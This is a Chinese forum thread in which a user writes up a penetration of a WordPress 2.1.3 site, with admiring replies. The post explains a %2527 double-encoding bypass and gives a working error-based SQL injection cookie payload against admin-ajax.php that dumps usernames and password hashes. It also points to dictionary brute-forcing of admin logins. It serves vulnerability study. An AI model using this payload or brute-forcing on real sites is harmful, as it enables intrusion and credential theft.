查看: 13983|回复: 9

记一次渗透过程

[复制链接]
  • TA的每日心情

    2016-11-3 18:40
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2013-11-14 23:45:14 | 显示全部楼层 |阅读模式
    本帖最后由 ilx 于 2013-11-15 13:14 编辑

    //其实我是半个标题党。。标题不太好想啊!

    网站程序用的是 WordPress 2.1.3 ,于是我就在网上搜了漏洞 发现了个 sql注入  链接:http://www.bitscn.com/network/security/200709/110036.html
    文章里给了个盲注exp 不好使 没几次暴出来的密码都使不一样 囧.
      决定还是自己动手吧 然后看了下文章里的分析


    [PHP] 纯文本查看 复制代码
     function check_ajax_referer() {
    $cookie = explode('; ', urldecode(empty($_POST['cookie']) ?
    $_GET['cookie'] : $_POST['cookie'])); // AJAX scripts must pass
    cookie=document.cookie
    foreach ( $cookie as $tasty ) {
    if ( false !== strpos($tasty, USER_COOKIE) )
    $user = substr(strstr($tasty, '='), 1);
    if ( false !== strpos($tasty, PASS_COOKIE) )
    $pass = substr(strstr($tasty, '='), 1);
    }
    if ( !wp_login( $user, $pass, true ) )
    die('-1')


    wp-set.jpg


    我们 通过 strpos($tasty, USER_COOKIE) 和 strpos($tasty, PASS_COOKIE) 的验证就可以了   USER_COOKIE和PASS_COOKIE都是常量
    可以看到上图get_option('siteurl')是从数字库中读网站地址 在加一次md5值就可以通过验证了

    code.jpg
    vale.jpg

    知道这个后我们来构造下
    因为用了urldecode(),我们用%2527来绕过wp做的转义限制

    gpc.jpg

    注入:

            if ( !$user = $wpdb->get_row("SELECT * FROM $wpdb->users WHERE user_login = '$user_login'") )
                    return false;

    /wp-admin/admin-ajax.php

    cookie=wordpressuser_md5(网站url地址)=aa%2527 and(select 1 from(select count(*),concat((select concat(user_login,0x5e,user_pass,0x5e) from wp_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- n; wordpresspass_md5(网站url地址)=dddddd

    test.jpg

    --------------------------------------------------
    题外话:

    (ps :最后我自己测试了 urldecode() %2527绕过  
    <?php
    $str=urldecode($_GET['a']);
    echo $_GET['a'];
    ?>

    %25 是 % 的url 编码
    测试中 穿进来的值是 %27 所已好像是%25被转码变成了%连带后面的27就是 %27

    %27在被urldecode转码就是 ' 号 绕过了限制

    这个是我apache里面的日志
    127.0.0.1 - - [14/Nov/2013:23:35:10 +0800] "POST /1.php?a=%2527 HTTP/1.1" 200 3
    在网上搜了下 有的好像说是浏览器转的  => http://www.hx95.com/Article/Crack/201208/60172.html
    --------------------------------------------------

    看了下php手册
    手册中有几条是这样写的  

    urldecode:超全局变量 $_GET 和 $_REQUEST 已经被解码了。对 $_GET 或 $_REQUEST 里的元素使用 urldecode() 将会导致不可预计和危险的结果。
    $GET :  GET 是通过 urldecode() 传递的


    就是说 $_GET 值是已经被url解码过的了。
    %2527 解码完了就变成了 %27 然后程序自己又使用了 urldecode 然后就绕过了


    --------------------------------------------------

    我也是菜鸟

    最后说一句  WordPress 可以用wpscan 挺好使的

    还有对于 WordPress 可以使用字典来破解后台密码的 网上有脚本。

    评分

    参与人数 4i币 +40 收起 理由
    KingSKY + 10 支持原创
    土豆 + 10 支持原创
    Free_小东 + 10 膜拜大牛
    90_ + 10 支持原创

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2013-11-14 23:48:50 | 显示全部楼层
    最近都喜欢把文章贴出来哦
    建议还是word格式的为好

    点评

    有一次 我发现下载自己附件也扣金币 然后都直接贴  详情 回复 发表于 2013-11-15 08:27
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2024-7-29 21:03
  • 签到天数: 657 天

    [LV.9]以坛为家II

    发表于 2013-11-14 23:59:42 | 显示全部楼层
    新手表示不懂
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2013-11-15 00:25:16 | 显示全部楼层
    大牛很活跃啊
    回复 支持 反对

    使用道具 举报

    lvyefeihun 该用户已被删除
    发表于 2013-11-15 01:29:57 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2020-12-4 20:42
  • 签到天数: 23 天

    [LV.4]偶尔看看III

    发表于 2013-11-15 04:17:28 | 显示全部楼层
    IL 审计牛。。。。 我擦。膜拜。。。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-11-15 08:27:34 | 显示全部楼层
    90_ 发表于 2013-11-14 23:48
    最近都喜欢把文章贴出来哦
    建议还是word格式的为好

    有一次 我发现下载自己附件也扣金币 然后都直接贴
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-5-30 09:59
  • 签到天数: 9 天

    [LV.3]偶尔看看II

    发表于 2013-11-15 08:53:54 | 显示全部楼层
    il 大牛~~~~~~~~~~~~~~~~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2020-4-29 10:22
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2013-11-15 10:49:29 | 显示全部楼层
    审计大牛  膜拜下。。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-12-11 20:10
  • 签到天数: 24 天

    [LV.4]偶尔看看III

    发表于 2013-11-15 14:32:38 | 显示全部楼层
    看的我这个蛋疼菊紧啊 只能膜拜了 牛人
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-25 13:05 , Processed in 0.034928 second(s), 21 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部